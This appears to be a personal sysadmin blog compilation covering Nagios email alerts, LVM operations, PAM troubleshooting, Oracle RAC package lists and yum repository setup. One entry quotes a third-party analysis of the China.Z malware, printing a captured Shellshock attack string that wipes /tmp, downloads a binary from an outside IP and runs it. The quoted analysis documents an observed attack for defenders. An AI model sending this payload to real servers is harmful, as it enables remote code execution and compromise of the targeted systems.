nagios mail notify

There are lots of services monitor in your nagios,what if the service is down?
The most important issue is that the admin should be notified by the first time,email is great tool on it.

1.contact.cfg

edit the contact.cfg file to tell the nagios who is the admin to receieve all the mail

# template which is defined elsewhere.

define contact{
        contact_name                    nagiosadmin             ; Short name of user
        use                             generic-contact         ; Inherit default values from generic-contact template (de
fined above)
        alias                           Nagios Admin            ; Full name of user

        email                           admin@gmail.com  ; <<***** CHANGE THIS TO YOUR EMAIL ADDRESS ******
        }

2.commands.cfg

nothing need to be changed in the commands.cfg,the sample is marked below:

# 'notify-host-by-email' command definition
define command{
        command_name    notify-host-by-email
        command_line    /usr/bin/printf "%b" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME
$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n" | /bin/mail -s "** $NOTI
FICATIONTYPE$ Host Alert: $HOSTNAME$ is $HOSTSTATE$ **" $CONTACTEMAIL$
        }

# 'notify-service-by-email' command definition
define command{
        command_name    notify-service-by-email
        command_line    /usr/bin/printf "%b" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SER
VICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Inf
o:\n\n$SERVICEOUTPUT$\n" | /bin/mail -s "** $NOTIFICATIONTYPE$ Service Alert: $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$ 
**" $CONTACTEMAIL$
        }

3.using the sendmail in linux to sending mail

vi the /etc/mail.rc which is the config file of sendmail

# add by admin

set from=sender@gmail.com smtp=smtp.gmail.com
set smtp-auth-user=sender@gmail.com smtp-auth-password=pwd_email_account smtp-auth=login

4.windows.cfg
enable the function of mail notification by add option “notifications_enabled 1”

# Change the host_name to match the name of the host you defined above

define service{
        use                     generic-service
        host_name               COS360,PRINTER_SRV_BJ,MENJIN,VM_BJ
        service_description     C:\ Drive Space
        check_command           check_nt!USEDDISKSPACE!-l c -w 80 -c 90
        notifications_enabled   1
        }

//add  notifications_enabled in services will open the notification

5.tesing

bring down one of the service,you will get the email notification

–EOF–

nagios

you can use nagios to monitor your infrastructure of basic IT resources.

you should first define a host to be monitored then use the define service to do the action,it’s the OO thinking mind.

taking the NT platform as a example,install the NSClient++ plugin as agent to the hosts you want to monitor.

define host{
        use             windows-server  ; Inherit default values from a template
        host_name       host1  ; The name we're giving to this host
        alias           COS Security Server     ; A longer name associated with the host
        address         172.16.60.134   ; IP address of the host
        }


define service{
        use                     generic-service
        host_name               host1
        service_description     NSClient++ Version
        check_command           check_nt!CLIENTVERSION
        }

111

check_command is the bin action of monitoring the resource,there are lots of monitor action in $nagios/bin and you add

–EOF–

wordpress post to pdf issue

post to pdf issue,you need the post2pdf plugin and you need to solve the mbstring and encoding issue of php.

work as follow:
http://www.knowledgebase-script.com/kb/article/how-to-enable-mbstring-in-php-46.html
//
Below is a sample excerpt php.ini file which contains the configuration of mbstring variables.
[mbstring]
mbstring.language = all
mbstring.internal_encoding = UTF-8
mbstring.http_input = auto
mbstring.http_output = UTF-8
mbstring.encoding_translation = On
mbstring.detect_order = UTF-8
mbstring.substitute_character = none;
mbstring.func_overload = 0
mbstring.strict_encoding = Off
– See more at: http://www.knowledgebase-script.com/kb/article/how-to-enable-mbstring-in-php-46.html#sthash.sjfHxMHP.dpuf
//

configure the php with –enable-mbstring=all option

..

–EOF–

user local logon fail

I can access my linux from the ssh but failed in local logon with error in /var/log/security as below:

Jun 24 11:19:36 localhost login: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jun 24 11:19:36 localhost login: Permission denied

the root reason is the error in /etc/pam.d/login:

[root@VM42 ~]# more /etc/pam.d/login
#%PAM-1.0
auth [user_unknown=ignore success=ok ignore=ignore default=bad] pam_securetty.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
# pam_selinux.so close should be the first session rule
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_console.so
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session    required     pam_selinux.so open
session    required     pam_namespace.so
session    optional     pam_keyinit.so force revoke
session    include      system-auth
-session   optional     pam_ck_connector.so
# add for oracle install
session    reqiured     pam_limits.so

the spell of reqiured is not correct….Correct it,everything goes write…

-EOF-

China.z Malware info

My prod server got a security issue where below show the same case:

From :http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying the request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

also,you can follow the pages as workround guide:

1.http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2.http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3.http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html

–EOF–

 

some basic operations of LVM

 

1.change the partition id to LVM format(id=8e)
 
after "fdisk /dev/sdb",you can go through fdisk–>t—>8e to change the partition to linux LVM format
 
//to check the partition id information 
fdisk -l
 
Disk /dev/sda: 21.4 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1        2458    19743853+  83  Linux
/dev/sda2            2459        2610     1220940   82  Linux swap / Solaris
 
Disk /dev/sdb: 2147 MB, 2147483648 bytes
255 heads, 63 sectors/track, 261 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1         125     1004031    8e  Linux LVM
/dev/sdb2             126         261     1092420   8e  Linux LVM
 
Disk /dev/sdc: 2147 MB, 2147483648 bytes
255 heads, 63 sectors/track, 261 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdc1               1         125     1004031   8e  Linux LVM
/dev/sdc2             126         261     1092420   8e  Linux LVM
 
2.create pv
pvcreate /dev/sdb1 /dev/sdb2
Physical volume "/dev/sdb1" successfully created
Physical volume "/dev/sdb2" successfully created
 
//query the pv info
pvscan
PV /dev/sdb1                      lvm2 [980.50 MB]
PV /dev/sdb2                      lvm2 [1.04 GB]
 
3.create vg
[root@hundsun ~]# vgcreate testvg /dev/sdb1 /dev/sdb2
Volume group "testvg" successfully created
//query the vg information you just created
 
[root@hundsun ~]# vgscan
Reading all physical volumes.  This may take a while…
Found volume group "testvg" using metadata type lvm2
 
4.display the information
//you can see the pv information 
 
[root@hundsun ~]# pvdisplay
  "/dev/sdb1" is a new physical volume of "980.50 MB"
  — NEW Physical volume —
  PV Name               /dev/sdb1
  VG Name
  PV Size               980.50 MB
  Allocatable           NO
  PE Size (KByte)       0
  Total PE                  0
  Free PE                  0
  Allocated PE          0
  PV UUID               UuuhUL-TIJx-JT0w-1yqv-ugWx-aWaj-gExW6w
 
  "/dev/sdb2" is a new physical volume of "1.04 GB"
  — NEW Physical volume —
  PV Name               /dev/sdb2
  VG Name
  PV Size               1.04 GB
  Allocatable           NO
  PE Size (KByte)       0
  Total PE              0
  Free PE               0
  Allocated PE          0
  PV UUID               gi9xoW-qvv7-pSWP-ovcG-vjrt-NaI1-KwzyAa
 
5.display vg information
//display the information of vg
 
[root@hundsun ~]# vgdisplay
  — Volume group —
  VG Name               testvg
  System ID
  Format                lvm2
  Metadata Areas        2
  Metadata Sequence No  1
  VG Access             read/write
  VG Status             resizable
  MAX LV                0
  Cur LV                0
  Open LV               0
  Max PV                0
  Cur PV                2
  Act PV                2
  VG Size               2.00 GB
  PE Size               4.00 MB
  Total PE              511
  Alloc PE / Size       0 / 0
  Free  PE / Size       511 / 2.00 GB
  VG UUID               M8rjyz-egoA-Oyda-u8Ou-nS4l-gkrf-1Jjen6
 
6.delete a vg
[root@hundsun ~]# vgremove testvg
Volume group "testvg" successfully removed
 
7.create LV
[root@hundsun mapper]# lvcreate -L 200M -n firstLV testvg
Logical volume "firstLV" created
 
//a device will be created at /dev/mapper/{vg_name-lv_name}
[root@hundsun mapper]# ls -l /dev/mapper/testvg-firstLV
brw-rw—- 1 root disk 253, 0 Oct 15 05:09 /dev/mapper/testvg-firstLV
 
//lvdisplay will display the all the lv information
[root@hundsun testvg]# lvdisplay
  — Logical volume —
  LV Name                /dev/testvg/firstLV
  VG Name                testvg
  LV UUID                vf8a9c-jHAC-She5-yzqh-rvod-osv7-vaSYfp
  LV Write Access        read/write
  LV Status              available
  # open                 0
  LV Size                200.00 MB
  Current LE             50
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto
  – currently set to     256
  Block device           253:0
 
[root@hundsun testvg]# pwd
/dev/testvg
[root@hundsun testvg]# ls -lrt
total 0
lrwxrwxrwx 1 root root 26 Oct 15 05:09 firstLV -> /dev/mapper/testvg-firstLV
 
//you can see the /dev/mapper/lv was referenced by /dev/testvg/firstLV
 
//after create lv,use mkfs.ext3 to mk a ext3 filesystem and mount it 
 
8.create a ext3 filesystem using the lv just created and mount it
 
[root@hundsun testvg]# mkfs.ext3 /dev/testvg/firstLV
mke2fs 1.39 (29-May-2006)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
51200 inodes, 204800 blocks
10240 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67371008
25 block groups
8192 blocks per group, 8192 fragments per group
2048 inodes per group
Superblock backups stored on blocks:
        8193, 24577, 40961, 57345, 73729
 
Writing inode tables: done
Creating journal (4096 blocks): done
Writing superblocks and filesystem accounting information: done
 
This filesystem will be automatically checked every 33 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.
 
//mount it to a point
[root@hundsun /]# mount -t    ext3    /dev/testvg/firstLV /data
[root@hundsun /]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              19G   12G  5.9G  67%   /
tmpfs                 507M     0  507M   0%      /dev/shm
none                  507M  104K  507M   1%    /var/lib/xenstored
/dev/mapper/testvg-firstLV        194M  5.6M  179M   4% /data
 
9.extend the lv and the mount point filesystem using lvextend
//extend the lv using lvextend,but the mount point of filesystem can not sync the change untill
//you resize2fs -p /dev/testvg/{lvname}
//before you resize2fs the filesyetem,the /data have 200M and the +100M had not take place
 
[root@hundsun /]# lvextend -L +100M /dev/testvg/firstLV
  Extending logical volume firstLV to 300.00 MB
  Logical volume firstLV successfully resized
[root@hundsun /]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              19G   12G  5.8G  67% /
tmpfs                 507M     0  507M   0% /dev/shm
none                  507M  104K  507M   1% /var/lib/xenstored
/dev/mapper/testvg-firstLV
                      194M  5.6M  179M   4% /data
 
//resize the filesystem to call the change of lv
[root@hundsun /]# resize2fs -p /dev/testvg/firstLV
resize2fs 1.39 (29-May-2006)
Filesystem at /dev/testvg/firstLV is mounted on /data; on-line resizing required
Performing an on-line resize of /dev/testvg/firstLV to 307200 (1k) blocks.
The filesystem on /dev/testvg/firstLV is now 307200 blocks long.
 
[root@hundsun /]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              19G   12G  5.8G  67% /
tmpfs                 507M     0  507M   0% /dev/shm
none                  507M  104K  507M   1% /var/lib/xenstored
/dev/mapper/testvg-firstLV
                      291M  6.1M  270M   3% /data
 
–EOF–

 

rpm prepare for rac install on linux

there are the rpm information listed on note which you can get from below

Document 811306.1 RAC and Oracle Clusterware Best Practices and Starter Kit (Linux)

check out the example on oel4 x86_64,you need to install each needed rpm package to avoid the coming error msg.

—————————————————————————————————

64-Bit Required RPM's

Red Hat,Oracle] Enterprise Linux 4:
 
binutils-2.15.92.0.2-13.0.0.0.2.x86_64 (you can install binutils-2.15.92.0.2-18.x86_64.rpm from RHEL4 Update 3.)
 
compat-db-4.1.25-9.x86_64.rpm
 
compat-gcc-32-c++ (with Patch 5240469 to correct bad genoccish file. see Note WebIV:430526.1))
 
compat-libstdc++-33-3.2.3-47.3.x86_64.rpm
 
compat-libstdc++-33-3.2.3-47.3.i386.rpm 
 
control-center-2.8.0-12.x86_64.rpm
 
gcc-3.4.3-47.x86_64.rpm
 
gcc-c++-3.4.3-47.x86_64.rpm   
 
glibc-2.3.4-2.9.x86_64.rpm   
 
glibc-2.3.4-2.9.i386.rpm   
 
glibc-common-2.3.4-2.9.x86_64.rpm   
 
glibc-devel-2.3.4-2.9.x86_64.rpm   
 
glibc-devel-2.3.4-2.9.i386.rpm   
 
glibc-headers-2.3.4-2.9.x86_64.rpm   
 
glibc-kernheaders-2.4-9.1.87.x86_64.rpm   
 
gnome-libs-1.4.1.2.90-44.1.x86_64
 
libaio-0.3.103-3.i386.rpm
 
libaio-0.3.103-3.x86_64.rpm   
 
libgcc-3.4.3-9.EL4
 
libstdc++-3.4.3-22.1.x86_64   
 
libstdc++-devel-3.4.3-22.1.x86_64   
 
make-3.80-5.x86_64.rpm
 
pdksh-5.2.14-30.x86_64.rpm   
 
sysstat-5.0.5-1.x86_64.rpm   
 
util-linux-2.12a-16.EL4.23.x86_64 (for raw devices)   
 
xorg-x11-deprecated-libs-6.8.1-23
 
xscreensaver-4.18-5.rhel4.2.x86_64.rpm   
 

——————————————————————————–

it's quite easy to find the details, you need both x86 and x86_64 in some rpm packs

issue of yum config in rhel 5u5

rhel 5u5上打rpm包是非常烦人的事情,没有license,无法连接redhat的yum源。只好寻求centos的源帮忙。

进入/etc/yum.repos.d目录,里面有一个缺省的源rhel-debuginfo.repo,删掉、重建吧,里面的内容帮助不大。

[molin@localhost downloads]$ cd /etc/yum.repos.d

[molin@localhost downloads]$ vi rhel-debuginfo.repo

文件的内容如下:

[base]
name=CentOS-5 – Base

baseurl=http://ftp.sjtu.edu.cn/centos/5/os/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-centos5

这个时候如果你直接yum install rpm包的话,会遭遇报错:

warning: rpmts_HdrFromFdno: Header V3 DSA signature: NOKEY, key………….

还需要重新import key:

rpm –import http://centos.ustc.edu.cn/centos/RPM-GPG-KEY-CentOS-5

 

[root@hundsun ~]# yum install libaio-devel
Loaded plugins: rhnplugin, security
This system is not registered with RHN.
RHN support will be disabled.
Setting up Install Process
Resolving Dependencies
–> Running transaction check
—> Package libaio-devel.i386 0:0.3.106-5 set to be updated
—> Package libaio-devel.x86_64 0:0.3.106-5 set to be updated
–> Finished Dependency Resolution

Dependencies Resolved

================================================================================
Package Arch Version Repository Size
================================================================================
Installing:
libaio-devel i386 0.3.106-5 base 12 k
libaio-devel x86_64 0.3.106-5 base 11 k

Transaction Summary
================================================================================
Install 2 Package(s)
Upgrade 0 Package(s)

Total download size: 23 k
Is this ok [y/N]: y
Downloading Packages:
(1/2): libaio-devel-0.3.106-5.x86_64.rpm | 11 kB 00:00
(2/2): libaio-devel-0.3.106-5.i386.rpm | 12 kB 00:00
——————————————————————————–
Total 6.8 kB/s | 23 kB 00:03
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing : libaio-devel 1/2
Installing : libaio-devel 2/2

Installed:
libaio-devel.i386 0:0.3.106-5 libaio-devel.x86_64 0:0.3.106-5

Complete!

现在可以正常的yum了,当然上述的配置都是建立在这样的前提条件的:”能够ping通外网”

 

 

oracle public yum server

sometimes,you need a solution to the rpm dependency,while YUM is a better solution,if your server could access to the www, you are the luck one,check out these picked from http://public-yum.oracle.com/

Public Yum Server

 

Introduction

The Oracle public yum server offers a free and convenient way to install the latest Oracle Linux packages as well as packages from the Oracle VM installation media via a yum client.

You can download the full Oracle Linux and Oracle VM installation media via edelivery.oracle.com/linux. To stay current on errata updates, you may wish to subscribe to the Oracle Linux errata mailing list.

This yum server is offered without support of any kind. If you require support, please consider purchasing Oracle Linux Support via the online store, or via your sales representative.

Getting Started

  1. Download and Install Oracle Linux
  2. Download and copy the appropriate yum configuration file in place, by running the following commands as root:

    Oracle Linux 4, Update 6 or Newer

    # cd /etc/yum.repos.d # mv Oracle-Base.repo Oracle-Base.repo.disabled # wget http://public-yum.oracle.com/public-yum-el4.repo 

    Oracle Linux 5

    # cd /etc/yum.repos.d # wget http://public-yum.oracle.com/public-yum-el5.repo 

    Oracle Linux 6

    # cd /etc/yum.repos.d # wget http://public-yum.oracle.com/public-yum-ol6.repo 

    Oracle VM 2

    # cd /etc/yum.repos.d # wget http://public-yum.oracle.com/public-yum-ovm2.repo 
  3. Enable the appropriate repository by editing the yum configuration file
    • Open the yum configuration file in a text editor
    • Locate the section in the file for the repository you plan to update from, e.g. [el4_u6_base]
    • Change enabled=0 to enabled=1
  4. Begin using yum, for example:yum list

    yum install firefox

You may be prompted to confirm the import of the Oracle OSS Group GPG key.